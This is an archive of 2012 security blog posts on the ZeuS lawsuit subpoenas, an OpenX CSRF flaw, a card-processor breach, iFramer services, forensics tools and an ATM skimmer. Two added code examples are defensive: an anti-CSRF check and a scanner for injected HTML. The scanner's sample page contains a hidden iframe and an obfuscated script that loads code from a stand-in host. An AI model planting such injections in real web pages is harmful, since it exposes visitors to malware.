Archive for the ‘Security’ Category

Microsoft to Botmasters: Abandon Your Inboxes

May 4th, 2012

If the miscreants behind the ZeuS botnets that Microsoft sought to destroy with a civil lawsuit last month didn’t already know that the software giant also wished to unmask them, they almost certainly do now. Google, and perhaps other email providers, recently began notifying the alleged botmasters that Microsoft was requesting their personal details.

Page 1 of a subpoena Microsoft sent to Google.

Microsoft’s unconventional approach to pursuing dozens of ZeuS botmasters offers a rare glimpse into how email providers treat subpoenas for account information. But the case also is once again drawing fire from a number of people within the security community who question the wisdom and long-term consequences of Microsoft’s strategy for combating cybercrime without involving law enforcement officials.

Last month, Microsoft made news when it announced a civil lawsuit that it said disrupted a major cybercrime operation that used malware to steal $100 million from consumers and businesses over the past five years. That legal maneuver may have upset some cyber criminal operations, but it also angered many in the security research community who said they felt betrayed by the action. Critics accused Microsoft of exposing sensitive information that a handful of researchers had shared in confidence, and of delaying or derailing international law enforcement investigations into ZeuS Trojan activity.

Part of the controversy stems from the bargain that Microsoft struck with a federal judge in the case. The court granted Microsoft the authority to quietly seize dozens of domain names and Internet servers that miscreants used to control the botnets. In exchange, Microsoft agreed to make every effort to identify the “John Does” that had used those resources, and to give them an opportunity to contest the seizure. The security community was initially upset by Microsoft’s first stab at that effort, in which it published the nicknames, email addresses and other identifying information on the individuals thought to be responsible for renting those servers and domains.

And then the other shoe dropped: Over the past few days, Google began alerting the registrants of more than three dozen Gmail accounts that were the subject of Microsoft’s subpoenas for email records. The email addresses were already named in Microsoft’s initial complaint posted at zeuslegalnotice.com, which listed nicknames and other information tied to 39 separate “John Does” that Microsoft is seeking to identify. But when Microsoft subpoenaed the email account information on those John Does, Google followed its privacy policy, which is to alert each of the account holders that it was prepared to turn over their personal information unless they formally objected to the action by a certain date.

According to sources who received the notices but asked not to be named, the Google alerts read:

“Hello,

Google has received a subpoena for information related to your Google
account in a case entitled Microsoft Corp., FS-ISAC, Inc. and NACHA v.
John Does 1-39 et al., US District Court, Northern District of California,
1:12-cv-01335 (SJ-RLM) (Internal Ref. No. 224623).

To comply with the law, unless you provide us with a copy of a motion
to quash the subpoena (or other formal objection filed in court) via
email at google-legal-support@google.com by 5pm Pacific Time on May
22, 2012, Google may provide responsive documents on this date.

For more information about the subpoena, you may wish to contact the
party seeking this information at:

Jacob M. Heath
Orrick, Herrington, & Sutcliffe, LLP
Jacob M. Heath, 1000 Marsh Road
Menlo Park, CA 94025

Google is not in a position to provide you with legal advice.

If you have other questions regarding the subpoena, we encourage you
to contact your attorney.

Thank you.”

Unlike most of its competitors in the Webmail industry, Google is exceptionally vocal about its policy for responding to subpoenas. This has earned it top marks from privacy groups like the Electronic Frontier Foundation (EFF), which recently ranked ISPs and social media firms on the transparency of their policies about responding to requests for information filed by the government or from law enforcement.

Google spokeswoman Christine Chen said she could not comment on specific legal cases, but said the company complies with valid legal process.

“We take user privacy very seriously, and whenever we receive a request we make sure it meets both the letter and spirit of the law before complying,” Chen said. “When possible and legal to do so, we notify affected users about requests for user data that may affect them. And if we believe a request is overly broad, we will seek to narrow it.”

At least 15 of the email accounts named in Microsoft’s lawsuit were addresses at hotmail.com or msn.com, both free Webmail services run by Microsoft. It’s not clear whether Microsoft gave those account holders a heads up about the subpoena. I asked Richard Boscovich, the former Justice Department lawyer and one of the architects of Microsoft’s legal strategy to target botnets with civil actions; he didn’t know, and referred me to Microsoft’s compliance unit. I’m still waiting for an answer. But it’s worth noting that Google was the only email provider on EFF’s list that was recognized for reliably alerting users about data demands. Microsoft was not recognized on this front.

Marcia Hofmann, a senior staff attorney with the EFF, said Microsoft’s legal effort underscores the tension between traditional law enforcement processes and companies using civil litigation to protect their own users and to vindicate their own interests.

“I suspect this is a situation where Microsoft feels law enforcement isn’t moving quickly enough,” Hofmann said. “But it also basically compromises law enforcement’s ability to do anything about the problem, and makes it possible for the suspects to evade any sort of law enforcement action.”

CUT-AND-PASTE JUSTICE?

Critics of the Microsoft effort say certain clues prove that the company borrowed and published raw intelligence without fully understanding the data’s true value and origins. Andy Fried, a former law enforcement official and owner of the Alexandria, Va. based security consultancy Deteque, was a co-founder of the little-known ZeuS Working Group, an ad hoc and extremely secretive collection of law enforcement officials and private security professionals dedicated to tracking ZeuS activity with the aim of bringing those responsible to justice.

“A basic tenet of this trust group is that everyone feels free to share data, but the rule is you never release that data outside of the trust group without express permission of whoever provided the data,” Fried said. “But there was no way that the data Microsoft published was received independently. Much of it was cut-and-pasted verbatim, and some of the data included in the search warrant was horrifically out of date.”

Yevhen "Jonni" Kulibaba

For instance, several of the key crime lords that Microsoft is seeking to unmask are already in prison for their crimes. John Doe #22 in Microsoft’s complaint — alleged to have used the nickname “Jonni” — is none other than Yevhen Kulibaba, a Ukrainian man arrested in London in 2010 and named as a ringleader of a money mule recruitment gang there. Kulibaba is currently serving a four-year jail sentence in connection with the ZeuS activity.

Microsoft said John Doe #23 goes by the alias “jtk,” yet this was the nickname used by Yuriy Konovalenko, the 30-year-old accomplice of Kulibaba who also was arrested as part of the U.K.-based ZeuS gang. Konovalenko likewise was sentenced to four years in jail.

Microsoft’s John Doe #24 is thought to go by the nickname “Veggi Roma,” but according to sources familiar with the case, this was an inside joke based on a lucky break that led police to the U.K. gang’s location. Investigators in London had been working with the FBI to monitor the communications of several members of the London-based ZeuS gang, but for some time they did not know the whereabouts of the men, who were known at the time only as Jonni and Jtk. That is, until Jtk used his Internet connection to order a pizza to be delivered to their apartment. A “Veggi Roma” pizza, to be exact.

Yuriy "jtk" Konovalenko

Astute readers may be wondering how it is that Google’s emails and Microsoft’s subpoenas to the John Does named in the complaint are now public. According to Fried, that’s because some of the email addresses listed in Microsoft’s complaint as belonging to John Doe miscreants were in fact addresses used by security researchers who had registered domains to serve as “sinkholes” for one or more ZeuS botnets. Sinkholing is a practice by which researchers redirect the domain names or addresses that bots use to find their control servers to a server the researchers operate, so that the traffic from each bot-infected client goes straight to the research box, ready to be analyzed.

COLLATERAL DAMAGE

Microsoft maintains that it worked with several security industry partners, and that it was operating under the assumption that the information those partners provided was either their own, or was freely available amongst them for the purpose of securing the Internet.

Microsoft’s Boscovich said the company did not work with law enforcement on this operation, and so had no idea whether there were ongoing or adjudicated investigations related to the John Does named in its case. He emphasized that protecting customers was the company’s number one priority.

“Our main objective was to stop the bleeding, and everything we do is specifically related to that mission,” Boscovich said. “Congress specifically envisioned that it was and is appropriate for private entities to protect themselves and their interests, and as in this case, the interests of our customers. People are continuing to be victimized, computers compromised, identities stolen, and now those systems are posing a threat to other people on internet, irrespective of what operating systems they’re using.”

For his part, Fried said he believes Microsoft will soon find it more difficult to obtain sensitive information that security researchers and law enforcement gather about key cybercrime suspects. He also fears that the ZeuS working group and other informal information-sharing groups may disband or become less effective as a result of this case.

“Microsoft discounted everyone but themselves with their initial action, and they’ve compounded things pretty quickly with these subpoenas,” Fried said. “This is also going to cause collateral damage for a lot of trust groups, while all that they’ve accomplished is little more than a very minuscule inconvenience to the bad guys, whose servers were back up within 24 hours of the takedowns.”

Jon Praed, founding partner of the Arlington, Va. based Internet Law Group, said he’s sympathetic to Microsoft’s position, and believes Google should have taken the trouble to investigate whether the John Doe accounts named in Microsoft’s lawsuit deserved to be notified.

“Unfortunately, most email providers have a one-size-fits-all privacy policy,” Praed said. “All of these companies have tried to create the legal right to do the right thing, but they’re making almost no attempt to apply that policy in practice. At the same time, Microsoft is spending a tremendous amount of money trying to stop this activity, and I don’t know anyone else out there who is even trying to do this.”

OpenX Promises Fix for Rogue Ads Bug

May 3rd, 2012

Hackers are actively exploiting a dangerous security vulnerability in OpenX — an online ad-serving solution for Web sites — to run booby-trapped ads that serve malware and browser exploits across countless Web sites that depend on the solution.

Security experts have been warning for months about mysterious attacks on OpenX installations in which the site owners discovered new rogue administrator accounts. That access allows miscreants to load tainted ads on sites that rely on the software. The bad ads usually try to foist malware on visitors, or frighten them into paying for bogus security software.

OpenX is only now just starting to acknowledge the attacks, as more users are coming forward with unanswered questions about the mysteriously added administrator accounts.

This problem first came to my attention after I read a blog post by infosec researcher Mark Baldwin, who wrote late last month about finding an unauthorized administrative account called “openx-manager” on one of his clients’ OpenX 2.8.8 installations, the latest version. After much investigation, Baldwin found that the rogue admin account was created virtually at the same instant that he’d last logged in to the customer’s OpenX installation.

Based on these and other findings documented in his blog, Baldwin concluded that OpenX 2.8.8 contains an unpatched flaw known as a cross-site request forgery (CSRF) vulnerability. These types of flaws can be especially sneaky because they are used to trick the victim into loading a page that contains a malicious request. CSRF attacks are most often used to force an end user to execute unwanted actions on a Web application in which he/she is currently authenticated, such as purchasing an item, or adding/deleting account information.

Baldwin told me he believes the attackers were able to add the rogue admin account to his client’s OpenX installation because OpenX contains a CSRF vulnerability that allows such actions.

“When you log in to the OpenX application, an ad loads via an iframe on the right side of the dashboard,” Baldwin said in an interview with KrebsOnSecurity. “OpenX uses this to promote different products of theirs (currently OpenX Market). This iframe makes calls to d1.openx.org and most importantly, loads some JavaScript. This is important because the only way the CSRF attack would be able to create a new user is via JavaScript, since that action uses the POST method. The IP address of d1.openx.org is 173.241.250.2 and the address of adserver.openx.org is 173.241.250.3. For all I know these may be the same servers. My belief is that these systems were compromised and the JavaScript was modified to inject the rogue admin account via the iframe in the dashboard. So when an administrator logs in, the account would be created without any interaction from him.”
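The CSRF mechanism described above in working code, as an added example that is neither OpenX's code nor from the article: a constructed toy admin console that binds an anti-CSRF token to each login session and checks the browser's Origin header, so a POST to a hypothetical /users/add endpoint fired by script in a third-party iframe is rejected while the dashboard's own form, which carries the token, succeeds. All hostnames, the endpoint and the account names are assumptions.

```python
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Session:
    """Server-side session; the anti-CSRF token is minted once per login."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    """Minimal model of an HTTP request as the application sees it."""
    method: str
    path: str
    cookies: dict
    form: dict
    headers: dict


class AdminApp:
    """Toy admin console (constructed for this example, not OpenX code)."""

    def __init__(self, origin):
        self.origin = origin        # scheme://host the dashboard is served from
        self.sessions = {}          # session id -> Session
        self.users = {"admin"}

    def login(self, user):
        """Create a session and return the cookie value the browser will store."""
        sid = secrets.token_urlsafe(16)
        self.sessions[sid] = Session(user)
        return sid

    def csrf_token_for(self, sid):
        """Token the dashboard embeds in its own (same-origin) forms."""
        return self.sessions[sid].csrf_token

    def _csrf_ok(self, req, session):
        # 1) Browsers send Origin on cross-site POSTs; if present it must match.
        origin = req.headers.get("Origin")
        if origin is not None and origin != self.origin:
            return False
        # 2) Even without Origin, the form must carry the session's token.
        token = req.form.get("csrf_token", "")
        if not isinstance(token, str) or not token.isascii():
            return False
        return hmac.compare_digest(token, session.csrf_token)  # constant-time

    def handle(self, req):
        """Return an HTTP status code; state changes require a valid CSRF token."""
        session = self.sessions.get(req.cookies.get("sid", ""))
        if session is None:
            return 401
        if req.method != "POST":
            return 405
        if not self._csrf_ok(req, session):
            return 403
        if req.path == "/users/add":
            self.users.add(req.form["username"])
            return 200
        return 404


def demo():
    """Replay the two requests the article contrasts and report the outcome."""
    app = AdminApp("https://ads.example.test")
    sid = app.login("admin")   # the administrator is logged in to the dashboard

    # Forged request: script running inside a third-party iframe fires a POST.
    # The browser attaches the session cookie automatically, but the script
    # cannot read the token from the dashboard's DOM (different origin) and
    # the Origin header names the iframe's host, not the dashboard's.
    forged = Request("POST", "/users/add",
                     cookies={"sid": sid},
                     form={"username": "openx-manager"},   # name from the article
                     headers={"Origin": "https://ads-cdn.example.test"})
    forged_status = app.handle(forged)

    # Legitimate request: the dashboard's own form submits the embedded token.
    legit = Request("POST", "/users/add",
                    cookies={"sid": sid},
                    form={"username": "editor",
                          "csrf_token": app.csrf_token_for(sid)},
                    headers={"Origin": "https://ads.example.test"})
    legit_status = app.handle(legit)

    return {"forged_status": forged_status,
            "legit_status": legit_status,
            "users": sorted(app.users)}


if __name__ == "__main__":
    print(demo())
```

A per-session token only helps while the forging script runs in a different origin from the dashboard; script that executes inside the dashboard document itself can read the token, and that is an XSS problem rather than a CSRF one.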

I confronted OpenX officials about this on Monday. In a very brief phone call today, company executives declined to discuss the attacks in detail, but acknowledged the existence of a CSRF vulnerability in the software that powers both their free and enterprise advertising platforms. OpenX Chief Technology Officer Michael Todd said the company would soon be publishing instructions on its blog outlining steps that users can take to prevent attackers from taking advantage of this flaw, and that it hoped to roll out an official fix for its OpenX Source product, which is the free version of the platform offered to anyone who wishes to host their own digital advertising services.

“What we’re going to do early next week — on Monday or Tuesday — is release a new version of OpenX for people to download as soon as possible,” Todd said. “We’re taking an extra few days to make sure that this gets done correctly and that we’re doing all the testing we need to do before we push that out. But first, we’ll publish a mitigation post that will tell people how they can change their systems,” to mitigate the threat, he said.

OpenX’s head of communications, Al Duncan, inexplicably cut the interview short after I’d asked just two questions, so I was unable to gain clarity on other aspects of this attack, such as whether OpenX’s internal systems may have been abused in the compromises, and how long the company has been aware of the problem. I also wanted to know more about how this vulnerability differed from a similar CSRF flaw in OpenX v. 2.8.7 that was disclosed in June 2011 by researcher Narendra Shinde.

It’s unclear whether the CSRF flaw detailed by Shinde is effectively the same bug that exists in this latest version. But the attackers targeting these flaws appear to have used the same name for the rogue admin account that Baldwin discovered on his client’s OpenX installation: “openx-manager.”

Until OpenX publishes its blog post, users and customers of this product should consider reviewing the mitigation advice offered at Baldwin’s blog.

For more background on this subject, see OpenX forum posts from Nov. 2011, January 2012, March 2012, and April 2012. Internet security firms Armorize and Sophos also have been sounding the alarm about these attacks.

Global Payments Breach Window Expands

May 2nd, 2012

A hacker break-in at credit and debit card processor Global Payments Inc. dates back to at least early June 2011, Visa and MasterCard warned in updated alerts sent to card-issuing banks in the past week. The disclosures offer the first additional details about the length of the breach since Global Payments acknowledged the incident on March 30, 2012.

Visa and MasterCard send periodic alerts to card-issuing banks about cards that may need to be re-issued following a security breach at a processor or merchant. Indeed, it was two such alerts — issued within a day of each other in the final week of March — which prompted my reporting that ultimately exposed the incident. Since those initial alerts, Visa and MasterCard have issued at least seven updates, warning of additional compromised cards and pushing the window of vulnerability at Global Payments back further each time.

Initially, MasterCard and Visa warned that hackers may have had access to card numbers handled by the processor between Jan. 21, 2012 and Feb. 25, 2012. Subsequent alerts sent to banks have pushed that exposure window back to January, December, and then August. In an alert sent in the last few days, the card associations warned issuers of even more compromised cards, saying the breach extended back at least eight months, to June 2011.

Security experts say it is common for the tally of compromised cards to increase as forensic investigators gain a better grasp on the extent of a security breach. But so far, Global Payments has offered few details about the incident beyond repeating that less than 1.5 million card numbers may have been stolen from its systems.

In a letter (PDF) responding to questions from Senator Robert P. Casey (D-Pa.), Global Payments CEO Paul Garcia maintained that the company discovered the breach internally and on its own on March 8, and that it began alerting the card associations the following day. Garcia said their initial disclosure was “forced by wild speculation in the press regarding this matter and our company.”

Global Payments spokeswoman Amy Korn declined to comment for this story, but said the company would be releasing additional information about the incident in a statement on its Web site, 2012infosecurityupdate.com, later this evening.

Update, May 4, 12:37 p.m. ET: The Wall Street Journal published a story today citing unidentified sources as saying that at least 7 million card accounts are now considered potentially vulnerable because of this breach.

Service Automates Boobytrapping of Hacked Sites

May 1st, 2012

Hardly a week goes by without news of some widespread compromise in which thousands of Web sites that share a common vulnerability are hacked and seeded with malware. Media coverage of these mass hacks usually centers on the security flaw that allowed the intrusions, but one aspect of these crimes that’s seldom examined is the method by which attackers automate the booby-trapping and maintenance of their hijacked sites.

Google-translated version of iFrameservice's homepage

Regular readers of this blog may be unsurprised to learn that this is another aspect of the cybercriminal economy that can be outsourced to third-party services. Often known as “iFramers,” such services can simplify the task of managing large numbers of hacked sites that are used to drive traffic to sites that serve up malware and browser exploits.

At the very least, a decent iFramer service will allow customers to verify large lists of file transfer protocol (FTP) credentials used to administer hacked Web sites, scrubbing those lists of invalid credential pairs. The service will then upload the customer’s malware and malicious scripts to the hacked site, and check each link to ensure the trap is properly set.

A huge percentage of malware in the wild today has the built-in ability to steal FTP credentials from infected PCs. This is possible because people who administer Web sites often use FTP software to upload files and images, and allow those programs to store their FTP passwords. Thus, many modern malware variants will simply search for popular FTP programs on the victim’s system and extract any stored credentials.

The customer interface for the iFramer service.

Some services, like the one offered at iframeservice.net (pictured above and at left), offer a menu of extras to help customers maintain their Web-based minefields. Iframeservice.net attempts to gain a more permanent foothold on all sites for which it is given FTP credentials, testing the sites for additional security vulnerabilities (root exploits) that may grant administrative privileges on the site’s Web server.

This service also promises to help customers stay one step ahead of antivirus companies, by monitoring URL blacklists and generating customer alerts when boobytrapped pages get flagged as malicious. In addition, it offers the automated ability to obfuscate the true destination of malicious links as a way to confuse both antivirus scanners and the legitimate administrators of the hacked sites.

A recent compromise I helped a friend deal with reminds me of a stubborn fact about hacked sites that seems relevant here. Just as PC infections can result in the theft of FTP credentials, malware infestations also often lead to the compromise of any HTML pages stored locally on the victim’s computer. Huge families of malware have traditionally included the ability to inject malicious scripts into any and all Web pages stored on the host machine. In this way, PC infections can spread to any Web sites that the victim manages when the victim unknowingly uploads boobytrapped pages to his Web site.

Obviously, the best way to avoid these troubles is to ensure that your system doesn’t get compromised in the first place. But if your computer does suffer a malware infection and you manage a Web site from that machine, it’s a good idea to double check any HTML pages you may have stored locally and/or updated on your site since the compromise, and to change the password used to administer your Web site (using a strong password, of course).
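One way to do that double check, as an added example that is not from the original post: a small scanner, constructed here on Python's standard-library HTML parser, that walks a directory of locally stored HTML files and flags the markers this section describes: hidden or zero-size iframes, script tags loaded from hosts outside an allowlist, and inline scripts that use common obfuscation calls. The sample pages and hostnames are constructed for the example.

```python
import os
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Markers commonly left by mass-injection: hidden frames and escape-heavy scripts.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
OBFUSCATED = re.compile(r"\b(?:eval|unescape)\s*\(|String\.fromCharCode", re.I)


class InjectScanner(HTMLParser):
    """Collects findings for iframes and scripts that look injected."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed_hosts = {h.lower() for h in allowed_hosts}
        self.findings = []
        self._in_script = False

    def _is_foreign(self, url):
        host = urlparse(url).hostname
        return host is not None and host.lower() not in self.allowed_hosts

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        line = self.getpos()[0]
        if tag == "iframe":
            dims = [a.get(d, "").strip().lower().rstrip("px") for d in ("width", "height")]
            tiny = all(d in ("0", "1") for d in dims)          # 0x0 / 1x1 frame
            hidden = bool(HIDDEN_STYLE.search(a.get("style", "")))
            if tiny or hidden or self._is_foreign(a.get("src", "")):
                self.findings.append(f"line {line}: suspicious iframe src={a.get('src', '')!r}")
        elif tag == "script":
            self._in_script = True
            src = a.get("src", "")
            if src and self._is_foreign(src):
                self.findings.append(f"line {line}: script loaded from foreign host {src!r}")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # The parser hands over the body of a <script> element as one data chunk.
        if self._in_script and OBFUSCATED.search(data):
            self.findings.append(f"line {self.getpos()[0]}: obfuscated inline script")


def scan_html(text, allowed_hosts):
    """Return a list of human-readable findings for one HTML document."""
    p = InjectScanner(allowed_hosts)
    p.feed(text)
    p.close()
    return p.findings


def scan_tree(root, allowed_hosts):
    """Scan every .html/.htm file under root; map path -> findings (non-empty only)."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".html", ".htm")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings = scan_html(fh.read(), allowed_hosts)
                if findings:
                    report[path] = findings
    return report


# Constructed sample pages (not real sites): one clean, one seeded with injections.
CLEAN_PAGE = """<html><head><title>Home</title>
<script src="https://www.example.test/js/site.js"></script></head>
<body><h1>Welcome</h1><script>document.title = "Home";</script></body></html>"""

INJECTED_PAGE = """<html><head><title>Home</title>
<script src="https://www.example.test/js/site.js"></script>
<script src="http://stats-cdn.example.invalid/c.js"></script></head>
<body><h1>Welcome</h1>
<iframe src="http://stats-cdn.example.invalid/count.php" width="0" height="0" style="display:none"></iframe>
<script>document.write(unescape('%3Cs%63ript src%3D%22http%3A//x.example.invalid/a.js%22%3E%3C/script%3E'));</script>
</body></html>"""


if __name__ == "__main__":
    for finding in scan_html(INJECTED_PAGE, ["www.example.test"]):
        print(finding)
```

Run scan_tree() over the local copy of the site with the site's own hostnames as the allowlist; anything it reports deserves a look before the next upload, and a clean report is not proof of a clean page.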

Forensically Sound: Quick Post #3

April 29th, 2012

While I cannot say the past week was light, it definitely was quieter than most I encounter.

I’m still digging out the trench but the skies are clear.

Here are a couple of items that caught my attention this week.

Utilities and Tools

  • PDF Stream Dumper was recently updated to version 0.9.320. Check the second link for a summary of the new features; one is a VirusTotal plugin.
  • usboblivion – Google Project Hosting. This is actually an “anti-forensics” tool of sorts to strip out evidence of USB connected drives from the registry. It would be interesting to see if the tool itself leaves a signature of its usage (besides a clean registry I suppose…) behind.
  • Exploring Symbol Type Information with PdbXtract – Mandiant blog – New tool to explore programming database files. Probably most interesting to malware analysts.
  • triage-ir – Triage: Incident Response – Google Project Hosting. Another script-based tool to collect key information from a suspect system. Based on the Sysinternals Suite along with a few other key utilities. Kenneth Johnson has some thoughts recently in his Tools in the Toolbox – Triage post at the Random Thoughts of Forensics blog. Triage was updated to version 0.7 back on April 16th. More on the Automated Triage Utility here.
  • For those that still haven’t tried WinFE…. – Windows Forensic Environment blog. Brett Shavers shares a quick-start guide to encourage the hesitant on just how easy it is to build your own WinFE boot disk. Check it out.
  • Z-VSScopy Freeware – Z-DBackup – (free for personal use/$ for commercial use) – Very interesting tool new to me that allows you to browse VSS snapshots, create new ones, and copy files from a snapshot back out. It is actually a module of their Z-DBackup backup software, which makes sense as being able to leverage VSS shadow copies makes running backup jobs a bit smoother. Spotted in this AddictiveTips blog post: Create, Access, Delete & Mount Shadow Copies On Any Windows Version – Z-VSSCopy. Other well-known tools for monitoring/accessing VSS: ShadowExplorer and the VSC Toolset: A GUI Tool for Shadow Copies.

Tips and Reminders

More Mandiant Goodies!

Investigating Indicators of Compromise In Your Environment With Latest Version of Redline – This is an outstanding overview of the use and functionality of Mandiant’s free Redline tool. It really shows the power this tool can provide during a system assessment and incident response…if you are very familiar with it! 

If not, after you have read Doug Wilson’s guided walk-through above, dive deeper into the Redline User Guide.

Then hop over to the OpenIOC Framework page and check out the details there. Need some more Indicators of Compromise (IOC)? Drop into the IOCs on the MANDIANT Forums.

One more item: IOC Finder to collect host system data and report IOC’s.

An Eye on the Malware Front

  • Ransomcrypt Decryption Script – F-Secure Weblog : News from the Lab. The F-Secure team cracks the ransomware Trojan:W32/Ransomcrypt code to free the files. Interesting reading.
  • Pwning a Spammer’s Keylogger – SpiderLabs Anterior. This is a must-read post showing just how powerful the information a trained and determined malware analyst can be. Inspirational.
  • Resolving post-malware problems – TinyApps bloggist finds two great specialized tools for dealing with post-malware issues on a system.
  • The System Forensics blogger goes to town analyzing a sample piece of malware in two posts.
  • “Type www.” – “Ok, w-w-w-d-o-t”; antagonising call centre scammers - For lighter fare, Troy Hunt is primed and ready when cold-called by a virus call-center scammer. No foolin this dude! With a 45 min screen capture, grab the popcorn!
  • Windows 8 forensic previews

    The forensic learning and exploring is underway for the new Windows 8 system.  Here are just a few posts I’ve found touching on the new system.

    Windows 8 Forensics – Recent post by Ethan Fleisher at the Senator Patrick Leahy Center for Digital Investigation, Champlain College. Ethan goes long and in this first review covers passes at Recycle Bin properties and USB Drive activity.

    Windows 8 Forensics Part 2 – Ethan picks up at Internet History.

    Future topics of coverage promised by Ethan include Win 8 “reset and reload” feature, Event logs, Prefetching, Jump Lists, and File History features.

    The Computer Forensics at Champlain College Blog where these posts came from contains a great collection of fresh material and the addition of this blog to my RSS feed list seemed a no-brainer!

    Windows 8 Forensic Overview – Random Thoughts of Forensics blog – An extensive post by Kenneth Johnson covering Windows Registry artifacts.  Note, Kenneth updated his original post to reflect changes in observations between the Win8 Developer version and the newer Win8 Consumer version. Kenneth’s experience does highlight the challenge examiners and students have when a new OS is released in alpha/beta versions. It’s a great start to the learning process, however the path may be fraught with dead branches and dead-ends. Nothing will be 100% certain until the final release comes out. And even then, I suspect it will take some time for the forensic knowledge-base to be fully built-up.  There is still much to learn about Windows XP systems, and the books are still being written on Windows Vista/Win7 even as Windows 8 appears on the horizon!

    The “X” Factor

    Beyond the bits and bytes, deeper than the registry keys and that which lurks in unallocated space at the far-end of the hard drive, there is something special that sets some incident responders and forensic investigators apart from the rest.

    Whenever I get a bit discouraged of the drudgery and lack of “play-time” learning new tools and techniques and getting my boots dirty in the trenches on a good investigation, I take heart from posts like these that are reminders that it really does take something special–an “X” factor–to be a great responder.

    The Core Duo – The Digital Standard blog – From cepoug’s post

    So I have recently been doing a lot of speaking and teaching, and came to an interesting conclusion about what are the core (an in my opinion, critical) skills of our trade, which I have affectingly dubbed, “The Core Duo”.

    When I really started to think about it, what we do (Forensics and Incident Response) really boils down to only two things. 

    1. Spotting Patterns

    2. Spotting Anomalies

    Now, I know this sounds really simple…maybe too simple, but let me explain.  First of all, simplicity is something that I think is frequently minimized as being undesirable.  I think there are a lot of folks who think something to the effect of, “If something can be explained in simple, easy to understand terms, it must not be very complex”.  I challenge that this is not the case.  I think, that even the most complex situations (which we all know, cyber investigations are among the most technical and convoluted anywhere) is made up of components that can be broken down and simplified.  Being able to do this is a critical element in actually understanding what you are doing and why you are doing it.  That in turn leads to be successful at what you are doing.  Which finally, leads to you solving the case, and potentially, some bad guy going to jail.

    What makes a good forensicator? or how to get a job in Digital Forensics… – WriteBlocked. Michael Wilkinson opens up his review of key traits this way:

    If you are already working in IT, it is possible to complete either an industry certification or graduate study or even transfer directly into a forensic position, although this is becoming harder as the pool of qualified applicants continues to grow. However no matter how qualified you are this will never guarantee you a job. Certifications and qualifications are only good for getting past the HR screening process. After that the decision will be based on other factors, partially on your performance in the interview and partly on your performance in previous jobs. When I am looking for employees I am looking for two things, motivation and the ability to solve problems. I will take these attributes over certifications any day.

    A Fistful of Dongles: Border Collies – A Fistful of Dongles – Eric Huber turns to the four-legged friends for a nice analogy.

    You will live and die by the people you hire and the leadership that you give them. The most critical element of your security program is having the right people on your team and providing them with the leadership and resources that they need.  You absolutely need proper tools to secure your enterprise, but the tools are secondary to the people who use them. The purpose of the tools is to help your people do their jobs. Too many organizations treat their people as glorified tool drivers rather than security professionals. If you are spending more money each year on your tools than you are on your people, you’re probably in a very bad place with your security posture.

    Information security is very hard. It takes tremendous time, effort, and expense to even come close to mastery of critical information security skills such as incident response, malware analysis, and digital forensics. There is no tool that can ever substitute for a highly skilled and well-led information security professional.

    <snip>

    Meet Jet the Border Collie. You will find no creature on Earth more in the moment than a Border Collie like Jet chasing sheep. This is what they live to do. They are fantastic at it and they enjoy it immensely.  Incident response people are the modern day information security Border Collies.  We live in a time where we have an information security community made up of incident responders who absolutely live to get up in the morning and chase people out of our networks.

    Eric goes on to expand his meme wonderfully.

    This week I’m going to walk into the workplace with a Border Collie mentality: motivated, focused, and ready to perform.

    Cheers.

    –Claus V.

    Categories: Forensic, Security

    Correction to Java Update Story

    April 27th, 2012

    An earlier version of this blog post incorrectly stated that Oracle had shipped security updates for its Java software. Oracle did push out an update for Java earlier this month — Java 6 Update 32 — but the new version was a maintenance update that did not include security fixes. My apologies for any confusion this may have caused.

    Skimtacular: All-in-One ATM Skimmer

    April 25th, 2012

    I spent the past week vacationing (mostly) in Southern California, traveling from Los Angeles to Santa Barbara and on to the wine country in Santa Ynez. Along the way, I received some information from a law enforcement source in the area about a recent ATM skimmer attack that showcased a well-designed and stealthy all-in-one skimmer.

    The skimmer pictured below is the backside of a card acceptance slot overlay. It was recovered by a customer at a bank in the San Fernando Valley who called the cops upon her discovery. Police in the region still have no leads on who might have placed the device. The numeral “5” engraved in the upper right portion of this skimmer suggests that it was one in a series of fraud devices produced by this skimmer maker.

    Backside of an all-in-one ATM skimmer found this year at a bank in the San Fernando Valley area of California.

    The skimmer appears to be powered by a phone battery, which connects to the card reader device and to the circuit board for a video camera. Here’s a close-up of the video card+skimmer connection.

    Flip the device around, and you can see the tiny pinhole where the attached camera peers through the skimmer front to capture timestamped footage of victims entering their PINs.

    Notice the pinhole for the built-in camera, upper right.

    Of course, looking straight on at the skimmer as it would appear attached to a compromised ATM, it might be difficult to spot the pinhole, as shown in the following picture.

    A few tips about ATM skimmers and skimming scams. It’s difficult — once you’re aware of how sophisticated some of these skimmers can be — to avoid being paranoid around ATMs; friends and family often tease me for stopping to tug at ATMs that I pass on the street, even when I have no intention of withdrawing money from the machines.

    Still, it’s good and healthy to be somewhat paranoid while at an ATM. Make sure nobody is “shoulder surfing” you to watch you enter your PIN. A simple precaution defeats shoulder surfing and many other types of video-based PIN stealing mechanisms: Cover the PIN pad with your hand or another object when you enter your PIN.

    If you are withdrawing cash after hours, visit only well-lit ATMs and those that are in plain view of other public spaces. In the unlikely event that you discover a skimming device attached to the ATM, alert the bank or proprietor immediately. Do not attempt to walk away from a compromised ATM with a skimmer in hand. For one thing, thieves who place skimmers often lurk nearby to prevent such occurrences. Also, consider how you might explain to a police officer that the device you just removed from the ATM is not yours. If you must leave with evidence, take a picture of the compromised ATM using your mobile phone (and if you get a nice picture, please consider sending it to me!).

    Help Kickstart a Film on Cybercrime

    April 23rd, 2012

    A deep sense of doubt and dread began to sink in halfway through our journey down a long, lonely desert highway from just outside Austin to coastal Texas. We were racing against the clock (we’d just scarfed down our third meal in a row at a roadside Subway shop), yet my minivan companions — a filmmaker from California and a husband-and-wife camera crew — seemed pleased with the footage we’d collected so far. I was far less sanguine about our prospects, and was almost certain that our carefully-laid plans to ambush a money mule on camera were about to unravel.

    'Money mule' Geridana heading home.

